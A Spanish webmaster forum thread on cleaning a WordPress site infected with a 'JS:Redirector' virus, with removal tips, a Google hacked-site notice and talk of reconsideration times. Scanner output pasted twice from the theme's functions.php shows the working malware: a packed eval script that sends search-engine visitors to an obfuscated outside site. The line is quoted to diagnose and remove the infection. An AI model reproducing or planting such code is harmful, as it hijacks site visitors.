Cómo solucionar el virus JS:redirector-MR en WordPress

  • Autor Autor jerelesi
  • Fecha de inicio Fecha de inicio
jerelesi

jerelesi

1
Lambda
Social Media
Verificación en dos pasos activada
Verificado por Whatsapp
Suscripción a IA
Hola amigos, es la primera vez que me entra un virus y la verdad que me asusta un poco:

Enlace eliminado

Aver si me podeis decir como solucionarlo
¿Que puedo hacer?
¿Donde puede estar el problema?
 
Te recomiendo:

1) Sustituir tus archivos de WordPress
2) Revisar que no tengas algún archivo .php perdido por ahí con contenido extraño (ej. con funciones eval() y strings p,a,c,k,e,r
3) Instalar plugin Threats Scan para ver posibles razones por las cuales tu sitio pueda estar infectado.

Estos son algunos tips que te pueden ayudar a eliminarlo.
Te dejo un link que puede servir: Cómo limpiar sitio infectado con JS:Redirector Tir | WebLatam
 
Hola muchas gracias por tus consejos.
El plugin Threats Scan me ha dado:

Scanning Themes and Plugins for eval

Files:
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/JSON.php
22: * Javascript, and can be directly eval()'ed with no further parsing
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php
4047: $this->debug('in invoke_method, calling function using eval()');
4051: $this->debug('in invoke_method, calling class method using eval()');
4054: $this->debug('in invoke_method, calling instance method using eval()');
4073: @eval($funcCall);
7867: eval($evalStr);
7869: eval("\$proxy = new nusoap_proxy_$r('');");
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/Nusoap/class.soapclient.php
711: eval($evalStr);
713: eval("\$proxy = new nusoap_proxy_$r('');");
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/Minify/FirePHP.php
1035: * Javascript, and can be directly eval()'ed with no further parsing
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/W3/PgCache.php
1284: $result = eval($code);
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/themes/theme-micro/functions.php
247: echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
Hacer clic para expandir...


¿Cual puede ser?

Este creo que es el problema

/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/themes/theme-micro/functions.php
247: echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
Hacer clic para expandir...

OK muchas gracias amigo ese era el virus
 
Sí, en el tema de WordPress debes tener ese código malicioso. Tenés un backup del tema sin el código "<script..."? Si es así, reemplazalo y corré de nuevo el plugin a ver qué te da.

Te recomiendo deshabilitar el WP cache hasta que se solucione el problema. De lo contrario podría interferir ..

Saludos
 
Gracias amigo lo he solucionado gracias a ti.
Ahora lo que se me ve es:

Scanning Themes and Plugins for eval

Files:
/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/JSON.php
22: * Javascript, and can be directly eval()'ed with no further parsing


/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/Nusoap/nusoap.php
4047: $this->debug('in invoke_method, calling function using eval()');
4051: $this->debug('in invoke_method, calling class method using eval()');
4054: $this->debug('in invoke_method, calling instance method using eval()');
4073: @eval($funcCall);
7867: eval($evalStr);
7869: eval("\$proxy = new nusoap_proxy_$r('');");


/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/Nusoap/class.soapclient.php
711: eval($evalStr);
713: eval("\$proxy = new nusoap_proxy_$r('');");


/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/Minify/FirePHP.php
1035: * Javascript, and can be directly eval()'ed with no further parsing


/home/jerelesi/public_html/www.formatearwindowsxp.com/wp-content/plugins/w3-total-cache/lib/W3/PgCache.php
1284: $result = eval($code);
Hacer clic para expandir...

¿Podria tener algo mas?
 
Hoy me he encontrado con una caida de varias de mis paginas he consultado las herramientas para webmaster de google y me he encontrado:

Aviso de posible acceso no autorizado a www.xxx 19 de abril de 2012
Estimado webmaster o propietario del sitio www.xxx:
Te escribimos para informarte de que algunas páginas de www.xxx se etiquetarán en nuestros resultados de búsqueda indicando que es posible que se hayan interceptado. Esto se debe a que algunas de tus páginas incluyen contenido que podría afectar a la calidad y a la relevancia de dichos resultados. Parece que estas páginas han sido creadas y modificadas por un tercero, que podría haber accedido sin autorización a la totalidad de tu sitio o a una parte del mismo. En numerosas ocasiones, se suben archivos nuevos o se modifican los existentes, que aparecen como spam en nuestro índice.
A continuación se indican algunas URL de ejemplo que muestran este comportamiento:
www.xxx/xxxxxx/
Estas URL utilizan prácticas que no siguen nuestras directrices de calidad (disponibles en la página Directrices para webmasters - Ayuda de Herramientas para webmasters de Google).
Te recomendamos que investigues este asunto para proteger a tus usuarios. Si tu sitio se ha interceptado, debes identificar y solucionar la vulnerabilidad, además de eliminar de tus páginas el contenido malicioso. Ten en cuenta que, en la mayoría de los casos, este contenido malicioso se encuentra oculto mediante un proceso denominado "encubrimiento". Para obtener más información sobre el encubrimiento, consulta la página Encubrimiento, redireccionamientos elusivos en JavaScript y páginas puerta - Ayuda de Herramientas para webmasters de Google. Puedes comprobar si se están utilizando métodos de encubrimiento en tu sitio con la herramienta Explorar como Googlebot: Enlace eliminado. Una buena forma de empezar a solucionar la incidencia es solicitar la ayuda del servicio de asistencia técnica de tu proveedor de alojamiento web. También es importante que te asegures de que el software de tu sitio web esté actualizado con las últimas revisiones y actualizaciones de seguridad.
Para obtener más información sobre cómo corregir incidencias que afecten a tu sitio, consulta la siguiente página:
Cómo limpiar el sitio - Ayuda de Herramientas para webmasters de Google
Una vez que te hayas asegurado de que tu sitio es seguro, puedes solicitar que se reconsidere su inclusión a través de la página https://www.google.com/webmasters/tools/reconsideration?hl=es.
Atentamente,
Equipo de control de calidad de las búsquedas de Google
1600 Amphitheatre Parkway
Mountain View, CA 94043 (EE.UU.)
Te enviamos este mensaje de correo electrónico porque eres el propietario de un sitio verificado en las Herramientas para webmasters de Google. Si no quieres recibir este tipo de notificaciones sobre el sitio verificado, puedes eliminar tu propiedad sobre el mismo en la consola de las Herramientas para webmasters de Google.
Hacer clic para expandir...



He contactado con ellos atraves de una solicitud para decirles que ya lo tenia todo solucionado y me ponen lo siguiente:

El propietario de un sitio web nos ha pedido que revisemos el modo en que hemos indexado el sitio siguiente: Enlace eliminado
Lo revisaremos y, si observamos que ya no incumple nuestras Directrices para webmasters, nos plantearemos su indexación de nuevo. El proceso de solicitud de revisión puede tardar varias semanas. Si bien revisamos todas las solicitudes, no podemos responder a cada una de ellas.
Hacer clic para expandir...

Alguien sabe si de verdad son varias semanas o sera una cosa de dias.

Gracias
 
A mi tambien me llegó ese mensaje cuando infectaron mis sitios, estuve 10 dias sin solucionarlo ya que estaba de viaje y al volver tomé 3 dias más para recuperar todo. Envie la reconsideracion y al cabo de 2-3 dias mi sitio estaba apareciendo en las posiciones que normalmente tenía. Saludos
 
Hola franquicias, gracias me alivias, han sido 5 sitios y eso duele ajjajaja.

Espero que sea rapido, lo raro que en 1 de ellos no he perdido posiciones sigo estando primero, los otros 4 ni aparezco ajjaja
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

L
¿Cómo eliminar el virus JS:Redirector-YG en Wordpress?
Respuestas
14
Visitas
2K
jarocho
J
Atrás
Arriba